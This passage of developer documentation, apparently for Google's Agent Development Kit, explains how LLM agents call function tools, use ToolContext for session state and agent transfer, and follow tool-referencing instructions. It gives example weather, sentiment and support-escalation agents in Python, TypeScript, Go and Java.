Technically, a tool is typically a modular code component (**like a Python, Java, or TypeScript function**, a class method, or even another specialized agent) designed to execute a distinct, predefined task. These tasks often involve interacting with external systems or data.

### Key Characteristics

**Action-Oriented:** Tools perform specific actions for an agent, such as searching for information, calling an API, or performing calculations.

**Extends Agent capabilities:** They empower agents to access real-time information, affect external systems, and overcome the knowledge limitations inherent in their training data.

**Execute predefined logic:** Crucially, tools execute specific, developer-defined logic.
They do not possess their own independent reasoning capabilities like the agent's core Large Language Model (LLM). The LLM reasons about which tool to use, when, and with what inputs, but the tool itself just executes its designated function.

## How Agents Use Tools

Agents leverage tools dynamically through mechanisms often involving function calling. The process generally follows these steps:

1. **Reasoning:** The agent's LLM analyzes its system instruction, conversation history, and user request.
1. **Selection:** Using that analysis, the LLM decides which tool, if any, to execute, based on the tools available to the agent and the docstrings that describe each tool.
1. **Invocation:** The LLM generates the required arguments (inputs) for the selected tool and triggers its execution.
1. **Observation:** The agent receives the output (result) returned by the tool.
1. **Finalization:** The agent incorporates the tool's output into its ongoing reasoning process to formulate the next response, decide the subsequent step, or determine if the goal has been achieved.

Think of the tools as a specialized toolkit that the agent's intelligent core (the LLM) can access and utilize as needed to accomplish complex tasks.

## Tool Types in ADK

ADK offers flexibility by supporting several types of tools:

1. **[Function Tools](/adk-docs/tools-custom/function-tools/):** Tools created by you, tailored to your specific application's needs.
   - **[Functions/Methods](/adk-docs/tools-custom/function-tools/#1-function-tool):** Define standard synchronous functions or methods in your code (e.g., Python def).
   - **[Agents-as-Tools](/adk-docs/tools-custom/function-tools/#3-agent-as-a-tool):** Use another, potentially specialized, agent as a tool for a parent agent.
   - **[Long Running Function Tools](/adk-docs/tools-custom/function-tools/#2-long-running-function-tool):** Support for tools that perform asynchronous operations or take significant time to complete.
1.
**[Built-in Tools](/adk-docs/tools/built-in-tools/):** Ready-to-use tools provided by the framework for common tasks. Examples: Google Search, Code Execution, Retrieval-Augmented Generation (RAG). 1. **Third-Party Tools:** Integrate tools seamlessly from popular external libraries. Navigate to the respective documentation pages linked above for detailed information and examples for each tool type. ## Referencing Tool in Agent’s Instructions Within an agent's instructions, you can directly reference a tool by using its **function name.** If the tool's **function name** and **docstring** are sufficiently descriptive, your instructions can primarily focus on **when the Large Language Model (LLM) should utilize the tool**. This promotes clarity and helps the model understand the intended use of each tool. It is **crucial to clearly instruct the agent on how to handle different return values** that a tool might produce. For example, if a tool returns an error message, your instructions should specify whether the agent should retry the operation, give up on the task, or request additional information from the user. Furthermore, ADK supports the sequential use of tools, where the output of one tool can serve as the input for another. When implementing such workflows, it's important to **describe the intended sequence of tool usage** within the agent's instructions to guide the model through the necessary steps. ### Example The following example showcases how an agent can use tools by **referencing their function names in its instructions**. It also demonstrates how to guide the agent to **handle different return values from tools**, such as success or error messages, and how to orchestrate the **sequential use of multiple tools** to accomplish a task. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.tools import FunctionTool from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types APP_NAME="weather_sentiment_agent" USER_ID="user1234" SESSION_ID="1234" MODEL_ID="gemini-2.0-flash" # Tool 1 def get_weather_report(city: str) -> dict: """Retrieves the current weather report for a specified city. Returns: dict: A dictionary containing the weather information with a 'status' key ('success' or 'error') and a 'report' key with the weather details if successful, or an 'error_message' if an error occurred. """ if city.lower() == "london": return {"status": "success", "report": "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a chance of rain."} elif city.lower() == "paris": return {"status": "success", "report": "The weather in Paris is sunny with a temperature of 25 degrees Celsius."} else: return {"status": "error", "error_message": f"Weather information for '{city}' is not available."} weather_tool = FunctionTool(func=get_weather_report) # Tool 2 def analyze_sentiment(text: str) -> dict: """Analyzes the sentiment of the given text. Returns: dict: A dictionary with 'sentiment' ('positive', 'negative', or 'neutral') and a 'confidence' score. 
""" if "good" in text.lower() or "sunny" in text.lower(): return {"sentiment": "positive", "confidence": 0.8} elif "rain" in text.lower() or "bad" in text.lower(): return {"sentiment": "negative", "confidence": 0.7} else: return {"sentiment": "neutral", "confidence": 0.6} sentiment_tool = FunctionTool(func=analyze_sentiment) # Agent weather_sentiment_agent = Agent( model=MODEL_ID, name='weather_sentiment_agent', instruction="""You are a helpful assistant that provides weather information and analyzes the sentiment of user feedback. **If the user asks about the weather in a specific city, use the 'get_weather_report' tool to retrieve the weather details.** **If the 'get_weather_report' tool returns a 'success' status, provide the weather report to the user.** **If the 'get_weather_report' tool returns an 'error' status, inform the user that the weather information for the specified city is not available and ask if they have another city in mind.** **After providing a weather report, if the user gives feedback on the weather (e.g., 'That's good' or 'I don't like rain'), use the 'analyze_sentiment' tool to understand their sentiment.** Then, briefly acknowledge their sentiment. You can handle these tasks sequentially if needed.""", tools=[weather_tool, sentiment_tool] ) async def main(): """Main function to run the agent asynchronously.""" # Session and Runner Setup session_service = InMemorySessionService() # Use 'await' to correctly create the session await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=weather_sentiment_agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction query = "weather in london?" 
print(f"User Query: {query}") content = types.Content(role='user', parts=[types.Part(text=query)]) # The runner's run method handles the async loop internally events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response:", final_response) # Standard way to run the main async function if __name__ == "__main__": asyncio.run(main()) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, FunctionTool, InMemoryRunner, isFinalResponse, stringifyContent } from "@google/adk"; import { z } from "zod"; import { Content, createUserContent } from "@google/genai"; /** * Retrieves the current weather report for a specified city. */ function getWeatherReport(params: { city: string }): Record<string, string> { if (params.city.toLowerCase().includes("london")) { return { "status": "success", "report": "The current weather in London is cloudy with a " + "temperature of 18 degrees Celsius and a chance of rain.", }; } if (params.city.toLowerCase().includes("paris")) { return { "status": "success", "report": "The weather in Paris is sunny with a temperature of 25 " + "degrees Celsius.", }; } return { "status": "error", "error_message": `Weather information for '${params.city}' is not available.`, }; } /** * Analyzes the sentiment of a given text.
*/ function analyzeSentiment(params: { text: string }): Record<string, string> { if (params.text.includes("cloudy") || params.text.includes("rain")) { return { "status": "success", "sentiment": "negative" }; } if (params.text.includes("sunny")) { return { "status": "success", "sentiment": "positive" }; } return { "status": "success", "sentiment": "neutral" }; } const weatherTool = new FunctionTool({ name: "get_weather_report", description: "Retrieves the current weather report for a specified city.", parameters: z.object({ city: z.string().describe("The city to get the weather for."), }), execute: getWeatherReport, }); const sentimentTool = new FunctionTool({ name: "analyze_sentiment", description: "Analyzes the sentiment of a given text.", parameters: z.object({ text: z.string().describe("The text to analyze the sentiment of."), }), execute: analyzeSentiment, }); const instruction = ` You are a helpful assistant that first checks the weather and then analyzes its sentiment. Follow these steps: 1. Use the 'get_weather_report' tool to get the weather for the requested city. 2. If the 'get_weather_report' tool returns an error, inform the user about the error and stop. 3. If the weather report is available, use the 'analyze_sentiment' tool to determine the sentiment of the weather report. 4. Finally, provide a summary to the user, including the weather report and its sentiment.
`; const agent = new LlmAgent({ name: "weather_sentiment_agent", instruction: instruction, tools: [weatherTool, sentimentTool], model: "gemini-2.5-flash" }); async function main() { const runner = new InMemoryRunner({ agent: agent, appName: "weather_sentiment_app" }); await runner.sessionService.createSession({ appName: "weather_sentiment_app", userId: "user1", sessionId: "session1" }); const newMessage: Content = createUserContent("What is the weather in London?"); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session1", newMessage: newMessage, })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(text); } } } } main(); ``` ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. 
package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) type getWeatherReportArgs struct { City string `json:"city" jsonschema:"The city for which to get the weather report."` } type getWeatherReportResult struct { Status string `json:"status"` Report string `json:"report,omitempty"` } func getWeatherReport(ctx tool.Context, args getWeatherReportArgs) (getWeatherReportResult, error) { if strings.ToLower(args.City) == "london" { return getWeatherReportResult{Status: "success", Report: "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a chance of rain."}, nil } if strings.ToLower(args.City) == "paris" { return getWeatherReportResult{Status: "success", Report: "The weather in Paris is sunny with a temperature of 25 degrees Celsius."}, nil } return getWeatherReportResult{}, fmt.Errorf("weather information for '%s' is not available.", args.City) } type analyzeSentimentArgs struct { Text string `json:"text" jsonschema:"The text to analyze for sentiment."` } type analyzeSentimentResult struct { Sentiment string `json:"sentiment"` Confidence float64 `json:"confidence"` } func analyzeSentiment(ctx tool.Context, args analyzeSentimentArgs) (analyzeSentimentResult, error) { if strings.Contains(strings.ToLower(args.Text), "good") || strings.Contains(strings.ToLower(args.Text), "sunny") { return analyzeSentimentResult{Sentiment: "positive", Confidence: 0.8}, nil } if strings.Contains(strings.ToLower(args.Text), "rain") || strings.Contains(strings.ToLower(args.Text), "bad") { return analyzeSentimentResult{Sentiment: "negative", Confidence: 0.7}, nil } return analyzeSentimentResult{Sentiment: "neutral", Confidence: 0.6}, nil } func main() { ctx := context.Background() model, err := 
gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { log.Fatal(err) } weatherTool, err := functiontool.New( functiontool.Config{ Name: "get_weather_report", Description: "Retrieves the current weather report for a specified city.", }, getWeatherReport, ) if err != nil { log.Fatal(err) } sentimentTool, err := functiontool.New( functiontool.Config{ Name: "analyze_sentiment", Description: "Analyzes the sentiment of the given text.", }, analyzeSentiment, ) if err != nil { log.Fatal(err) } weatherSentimentAgent, err := llmagent.New(llmagent.Config{ Name: "weather_sentiment_agent", Model: model, Instruction: "You are a helpful assistant that provides weather information and analyzes the sentiment of user feedback. **If the user asks about the weather in a specific city, use the 'get_weather_report' tool to retrieve the weather details.** **If the 'get_weather_report' tool returns a 'success' status, provide the weather report to the user.** **If the 'get_weather_report' tool returns an 'error' status, inform the user that the weather information for the specified city is not available and ask if they have another city in mind.** **After providing a weather report, if the user gives feedback on the weather (e.g., 'That's good' or 'I don't like rain'), use the 'analyze_sentiment' tool to understand their sentiment.** Then, briefly acknowledge their sentiment. 
You can handle these tasks sequentially if needed.", Tools: []tool.Tool{weatherTool, sentimentTool}, }) if err != nil { log.Fatal(err) } sessionService := session.InMemoryService() runner, err := runner.New(runner.Config{ AppName: "weather_sentiment_agent", Agent: weatherSentimentAgent, SessionService: sessionService, }) if err != nil { log.Fatal(err) } session, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: "weather_sentiment_agent", UserID: "user1234", }) if err != nil { log.Fatal(err) } run(ctx, runner, session.Session.ID(), "weather in london?") run(ctx, runner, session.Session.ID(), "I don't like rain.") } func run(ctx context.Context, r *runner.Runner, sessionID string, prompt string) { fmt.Printf("\n> %s\n", prompt) events := r.Run( ctx, "user1234", sessionID, genai.NewContentFromText(prompt, genai.RoleUser), agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }, ) for event, err := range events { if err != nil { log.Fatalf("ERROR during agent execution: %v", err) } if event.Content.Parts[0].Text != "" { fmt.Printf("Agent Response: %s\n", event.Content.Parts[0].Text) } } } ``` ```java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; // Ensure this import is correct import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; import java.util.HashMap; import java.util.Locale; import java.util.Map; public class WeatherSentimentAgentApp { private static final String APP_NAME = "weather_sentiment_agent"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "1234"; private static final String MODEL_ID = "gemini-2.0-flash"; /** * Retrieves the current 
weather report for a specified city. * * @param city The city for which to retrieve the weather report. * @param toolContext The context for the tool. * @return A map containing the weather information. */ public static Map<String, Object> getWeatherReport( @Schema(name = "city") String city, @Schema(name = "toolContext") ToolContext toolContext) { Map<String, Object> response = new HashMap<>(); if (city.toLowerCase(Locale.ROOT).equals("london")) { response.put("status", "success"); response.put( "report", "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a" + " chance of rain."); } else if (city.toLowerCase(Locale.ROOT).equals("paris")) { response.put("status", "success"); response.put( "report", "The weather in Paris is sunny with a temperature of 25 degrees Celsius."); } else { response.put("status", "error"); response.put( "error_message", String.format("Weather information for '%s' is not available.", city)); } return response; } /** * Analyzes the sentiment of the given text. * * @param text The text to analyze. * @param toolContext The context for the tool. * @return A map with sentiment and confidence score. */ public static Map<String, Object> analyzeSentiment( @Schema(name = "text") String text, @Schema(name = "toolContext") ToolContext toolContext) { Map<String, Object> response = new HashMap<>(); String lowerText = text.toLowerCase(Locale.ROOT); if (lowerText.contains("good") || lowerText.contains("sunny")) { response.put("sentiment", "positive"); response.put("confidence", 0.8); } else if (lowerText.contains("rain") || lowerText.contains("bad")) { response.put("sentiment", "negative"); response.put("confidence", 0.7); } else { response.put("sentiment", "neutral"); response.put("confidence", 0.6); } return response; } /** * Calls the agent with the given query and prints the final response. * * @param runner The runner to use. * @param query The query to send to the agent.
*/ public static void callAgent(Runner runner, String query) { Content content = Content.fromParts(Part.fromText(query)); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { if (event.finalResponse() && event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { String finalResponse = event.content().get().parts().get().get(0).text().get(); System.out.println("Agent Response: " + finalResponse); } }); } public static void main(String[] args) throws NoSuchMethodException { FunctionTool weatherTool = FunctionTool.create( WeatherSentimentAgentApp.class.getMethod( "getWeatherReport", String.class, ToolContext.class)); FunctionTool sentimentTool = FunctionTool.create( WeatherSentimentAgentApp.class.getMethod( "analyzeSentiment", String.class, ToolContext.class)); BaseAgent weatherSentimentAgent = LlmAgent.builder() .model(MODEL_ID) .name("weather_sentiment_agent") .description("Weather Sentiment Agent") .instruction(""" You are a helpful assistant that provides weather information and analyzes the sentiment of user feedback **If the user asks about the weather in a specific city, use the 'get_weather_report' tool to retrieve the weather details.** **If the 'get_weather_report' tool returns a 'success' status, provide the weather report to the user.** **If the 'get_weather_report' tool returns an 'error' status, inform the user that the weather information for the specified city is not available and ask if they have another city in mind.** **After providing a weather report, if the user gives feedback on the weather (e.g., 'That's good' or 'I don't like rain'), use the 'analyze_sentiment' tool to understand their 
                    sentiment.** Then, briefly acknowledge their sentiment.
                    You can handle these tasks sequentially if needed.
                    """)
            .tools(ImmutableList.of(weatherTool, sentimentTool))
            .build();

    InMemorySessionService sessionService = new InMemorySessionService();
    Runner runner = new Runner(weatherSentimentAgent, APP_NAME, null, sessionService);

    // Use a city the tool recognizes ("london" or "paris") so that it returns a
    // "success" status.
    callAgent(runner, "weather in paris");
  }
}
```

## Tool Context

For more advanced scenarios, ADK allows you to access additional contextual information within your tool function by including the special parameter `tool_context: ToolContext`. When this parameter appears in the function signature, ADK **automatically** provides an **instance of the ToolContext** class each time your tool is called during agent execution.

The **ToolContext** provides access to several key pieces of information and control levers:

- `state: State`: Read and modify the current session's state. Changes made here are tracked and persisted.
- `actions: EventActions`: Influence the agent's subsequent actions after the tool runs (e.g., skip summarization, transfer to another agent).
- `function_call_id: str`: The unique identifier assigned by the framework to this specific invocation of the tool. Useful for tracking and correlating with authentication responses. This can also be helpful when multiple tools are called within a single model response.
- `function_call_event_id: str`: The unique identifier of the **event** that triggered the current tool call. This can be useful for tracking and logging purposes.
- `auth_response: Any`: Contains the authentication response/credentials if an authentication flow was completed before this tool call.
- Access to Services: Methods to interact with configured services like Artifacts and Memory.
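
The automatic injection described above can be pictured with a small, framework-free sketch. This is not ADK's implementation: `FakeToolContext`, `llm_visible_params`, and `call_tool` are hypothetical names invented for illustration, and the sketch only assumes that a framework can inspect a tool's signature to decide whether to pass a context object.

```python
import inspect
from dataclasses import dataclass, field


@dataclass
class FakeToolContext:
    """Hypothetical stand-in for ADK's ToolContext (illustration only)."""

    state: dict = field(default_factory=dict)
    function_call_id: str = "call-001"


def llm_visible_params(func):
    """Returns the parameter names a model would be asked to fill in."""
    return [
        name
        for name in inspect.signature(func).parameters
        if name != "tool_context"
    ]


def call_tool(func, llm_args, context):
    """Invokes a tool, injecting the context only if the signature asks for it."""
    kwargs = dict(llm_args)
    if "tool_context" in inspect.signature(func).parameters:
        kwargs["tool_context"] = context
    return func(**kwargs)


def remember_city(city: str, tool_context: FakeToolContext) -> dict:
    """Stores the last city the user asked about."""
    tool_context.state["last_city"] = city
    return {"status": "success", "call_id": tool_context.function_call_id}


def add(a: int, b: int) -> int:
    """A tool that does not request any context."""
    return a + b


ctx = FakeToolContext()
visible = llm_visible_params(remember_city)
result = call_tool(remember_city, {"city": "London"}, ctx)
total = call_tool(add, {"a": 1, "b": 2}, ctx)
print(visible, result, total, ctx.state)
```

In this sketch the model only ever sees `city`; the context argument is supplied by the calling code after the arguments have been chosen.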
Note that you shouldn't include the `tool_context` parameter in the tool function docstring. Since `ToolContext` is automatically injected by the ADK framework *after* the LLM decides to call the tool function, it is not relevant for the LLM's decision-making and including it can confuse the LLM.

### **State Management**

The `tool_context.state` attribute provides direct read and write access to the state associated with the current session. It behaves like a dictionary but ensures that any modifications are tracked as deltas and persisted by the session service. This enables tools to maintain and share information across different interactions and agent steps.

- **Reading State**: Use standard dictionary access (`tool_context.state['my_key']`) or the `.get()` method (`tool_context.state.get('my_key', default_value)`).
- **Writing State**: Assign values directly (`tool_context.state['new_key'] = 'new_value'`). These changes are recorded in the `state_delta` of the resulting event.
- **State Prefixes**: Remember the standard state prefixes:
    - `app:*`: Shared across all users of the application.
    - `user:*`: Specific to the current user across all their sessions.
    - (No prefix): Specific to the current session.
    - `temp:*`: Temporary, not persisted across invocations (useful for passing data within a single run call but generally less useful inside a tool context which operates between LLM calls).
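
To make the idea of delta tracking and key prefixes concrete, here is a minimal sketch that uses only the Python standard library. It is not ADK's `State` class: `TrackedState` and `scope_of` are hypothetical names, and the sketch assumes only what is described above (dictionary-style access, writes recorded as a delta, and scope determined by the key prefix).

```python
class TrackedState:
    """Hypothetical dict-like state that records every write as a delta."""

    def __init__(self, initial=None):
        self._value = dict(initial or {})
        self.delta = {}  # keys written since this object was created

    def __getitem__(self, key):
        return self._value[key]

    def __setitem__(self, key, value):
        self._value[key] = value
        self.delta[key] = value

    def get(self, key, default=None):
        return self._value.get(key, default)


def scope_of(key: str) -> str:
    """Maps a state key to the scope implied by its prefix."""
    for prefix in ("app", "user", "temp"):
        if key.startswith(prefix + ":"):
            return prefix
    return "session"  # no prefix means session scope


state = TrackedState({"user:preferences": {"theme": "light"}})

# Read, modify a copy, and write back so the change shows up in the delta.
prefs = dict(state.get("user:preferences", {}))
prefs["theme"] = "dark"
state["user:preferences"] = prefs
state["temp:scratch"] = 42

scopes = {key: scope_of(key) for key in state.delta}
print(state.delta)
print(scopes)
```

Only keys that were assigned appear in `delta`, which mirrors why a tool should write the updated value back to the state rather than rely on mutating a retrieved object in place.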
```py
from google.adk.tools import ToolContext, FunctionTool

def update_user_preference(preference: str, value: str, tool_context: ToolContext):
    """Updates a user-specific preference."""
    user_prefs_key = "user:preferences"
    # Get current preferences or initialize if none exist
    preferences = tool_context.state.get(user_prefs_key, {})
    preferences[preference] = value
    # Write the updated dictionary back to the state
    tool_context.state[user_prefs_key] = preferences
    print(f"Tool: Updated user preference '{preference}' to '{value}'")
    return {"status": "success", "updated_preference": preference}

pref_tool = FunctionTool(func=update_user_preference)

# In an Agent:
# my_agent = Agent(..., tools=[pref_tool])

# When the LLM calls update_user_preference(preference='theme', value='dark', ...):
# The tool_context.state will be updated, and the change will be part of the
# resulting tool response event's actions.state_delta.
```

```typescript
import { ToolContext } from "@google/adk";

// Updates a user-specific preference.
export function updateUserThemePreference(
  value: string,
  toolContext: ToolContext
): Record<string, any> {
  const userPrefsKey = "user:preferences";

  // Get current preferences or initialize if none exist
  const preferences = toolContext.state.get(userPrefsKey, {}) as Record<string, any>;
  preferences["theme"] = value;

  // Write the updated dictionary back to the state
  toolContext.state.set(userPrefsKey, preferences);
  console.log(
    `Tool: Updated user preference ${userPrefsKey} to ${JSON.stringify(toolContext.state.get(userPrefsKey))}`
  );

  return {
    status: "success",
    updated_preference: toolContext.state.get(userPrefsKey),
  };
  // When the LLM calls updateUserThemePreference("dark"):
  // The toolContext.state will be updated, and the change will be part of the
  // resulting tool response event's actions.stateDelta.
}
```

```go
import (
	"fmt"

	"google.golang.org/adk/tool"
)

type updateUserPreferenceArgs struct {
	Preference string `json:"preference" jsonschema:"The name of the preference to set."`
	Value      string `json:"value" jsonschema:"The value to set for the preference."`
}

type updateUserPreferenceResult struct {
	UpdatedPreference string `json:"updated_preference"`
}

func updateUserPreference(ctx tool.Context, args updateUserPreferenceArgs) (*updateUserPreferenceResult, error) {
	userPrefsKey := "user:preferences"

	// Get current preferences or initialize if none exist
	val, err := ctx.State().Get(userPrefsKey)
	if err != nil {
		val = make(map[string]any)
	}

	preferencesMap, ok := val.(map[string]any)
	if !ok {
		preferencesMap = make(map[string]any)
	}

	preferencesMap[args.Preference] = args.Value

	// Write the updated map back to the state
	if err := ctx.State().Set(userPrefsKey, preferencesMap); err != nil {
		return nil, err
	}

	fmt.Printf("Tool: Updated user preference '%s' to '%s'\n", args.Preference, args.Value)
	return &updateUserPreferenceResult{
		UpdatedPreference: args.Preference,
	}, nil
}
```

```java
import com.google.adk.tools.FunctionTool;
import com.google.adk.tools.ToolContext;
import java.util.Map;

// Updates a user-specific preference.
public Map<String, String> updateUserThemePreference(String value, ToolContext toolContext) {
  String userPrefsKey = "user:preferences:theme";

  // Write the new theme under the same user-scoped key that is read back below
  toolContext.state().put(userPrefsKey, value);
  System.out.printf("Tool: Updated user preference %s to %s%n", userPrefsKey, value);

  return Map.of(
      "status", "success",
      "updated_preference", toolContext.state().get(userPrefsKey).toString());
  // When the LLM calls updateUserThemePreference("dark"):
  // The toolContext.state will be updated, and the change will be part of the
  // resulting tool response event's actions.stateDelta.
}
```

### **Controlling Agent Flow**

The `tool_context.actions` attribute in Python and TypeScript, `ToolContext.actions()` in Java, and `tool.Context.Actions()` in Go, holds an **EventActions** object. Modifying attributes on this object allows your tool to influence what the agent or framework does after the tool finishes execution.

- **`skip_summarization: bool`**: (Default: False) If set to True, instructs the ADK to bypass the LLM call that typically summarizes the tool's output. This is useful if your tool's return value is already a user-ready message.
- **`transfer_to_agent: str`**: Set this to the name of another agent. The framework will halt the current agent's execution and **transfer control of the conversation to the specified agent**. This allows tools to dynamically hand off tasks to more specialized agents.
- **`escalate: bool`**: (Default: False) Setting this to True signals that the current agent cannot handle the request and should pass control up to its parent agent (if in a hierarchy). In a LoopAgent, setting **escalate=True** in a sub-agent's tool will terminate the loop.

#### Example

```py
# Copyright 2025 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from google.adk.agents import Agent
from google.adk.tools import FunctionTool
from google.adk.runners import Runner
from google.adk.sessions import InMemorySessionService
from google.adk.tools import ToolContext
from google.genai import types

APP_NAME = "customer_support_agent"
USER_ID = "user1234"
SESSION_ID = "1234"


def check_and_transfer(query: str, tool_context: ToolContext) -> str:
    """Checks if the query requires escalation and transfers to another agent if needed."""
    if "urgent" in query.lower():
        print("Tool: Detected urgency, transferring to the support agent.")
        tool_context.actions.transfer_to_agent = "support_agent"
        return "Transferring to the support agent..."
    else:
        return f"Processed query: '{query}'. No further action needed."

# The tool is exposed to the model under the function's name, 'check_and_transfer'.
escalation_tool = FunctionTool(func=check_and_transfer)

main_agent = Agent(
    model='gemini-2.0-flash',
    name='main_agent',
    instruction="""You are the first point of contact for customer support of an analytics tool. Answer general queries. If the user indicates urgency, use the 'check_and_transfer' tool.""",
    tools=[escalation_tool]
)

support_agent = Agent(
    model='gemini-2.0-flash',
    name='support_agent',
    instruction="""You are the dedicated support agent. Mention that you are a support handler and help the user with their urgent issue."""
)

main_agent.sub_agents = [support_agent]

# Session and Runner
async def setup_session_and_runner():
    session_service = InMemorySessionService()
    session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID)
    runner = Runner(agent=main_agent, app_name=APP_NAME, session_service=session_service)
    return session, runner

# Agent Interaction
async def call_agent_async(query):
    content = types.Content(role='user', parts=[types.Part(text=query)])
    session, runner = await setup_session_and_runner()
    events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content)

    async for event in events:
        if event.is_final_response():
            final_response = event.content.parts[0].text
            print("Agent Response: ", final_response)

# Note: In Colab, you can directly use 'await' at the top level.
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop.
await call_agent_async("this is urgent, i cant login")
```

```typescript
/**
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
*/ import { LlmAgent, FunctionTool, ToolContext, InMemoryRunner, isFinalResponse, stringifyContent } from "@google/adk"; import { z } from "zod"; import { Content, createUserContent } from "@google/genai"; function checkAndTransfer( params: { query: string }, toolContext?: ToolContext ): Record { if (!toolContext) { // This should not happen in a normal ADK flow where the tool is called by an agent. throw new Error("ToolContext is required to transfer agents."); } if (params.query.toLowerCase().includes("urgent")) { console.log("Tool: Urgent query detected, transferring to support_agent."); toolContext.actions.transferToAgent = "support_agent"; return { status: "success", message: "Transferring to support agent." }; } console.log("Tool: Query is not urgent, handling normally."); return { status: "success", message: "Query will be handled by the main agent." }; } const transferTool = new FunctionTool({ name: "check_and_transfer", description: "Checks the user's query and transfers to a support agent if urgent.", parameters: z.object({ query: z.string().describe("The user query to analyze."), }), execute: checkAndTransfer, }); const supportAgent = new LlmAgent({ name: "support_agent", description: "Handles urgent user requests about accounts.", instruction: "You are the support agent. Handle the user's urgent request.", model: "gemini-2.5-flash" }); const mainAgent = new LlmAgent({ name: "main_agent", description: "The main agent that routes non-urgent queries.", instruction: "You are the main agent. Use the check_and_transfer tool to analyze the user query. 
If the query is not urgent, handle it yourself.", tools: [transferTool], subAgents: [supportAgent], model: "gemini-2.5-flash" }); async function main() { const runner = new InMemoryRunner({ agent: mainAgent, appName: "customer_support_app" }); console.log("--- Running with a non-urgent query ---"); await runner.sessionService.createSession({ appName: "customer_support_app", userId: "user1", sessionId: "session1" }); const nonUrgentMessage: Content = createUserContent("I have a general question about my account."); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session1", newMessage: nonUrgentMessage })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(`Final Response: ${text}`); } } } console.log("\n--- Running with an urgent query ---"); await runner.sessionService.createSession({ appName: "customer_support_app", userId: "user1", sessionId: "session2" }); const urgentMessage: Content = createUserContent("My account is locked and this is urgent!"); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session2", newMessage: urgentMessage })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(`Final Response: ${text}`); } } } } main(); ``` ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. 

package main

import (
	"context"
	"fmt"
	"log"
	"strings"

	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
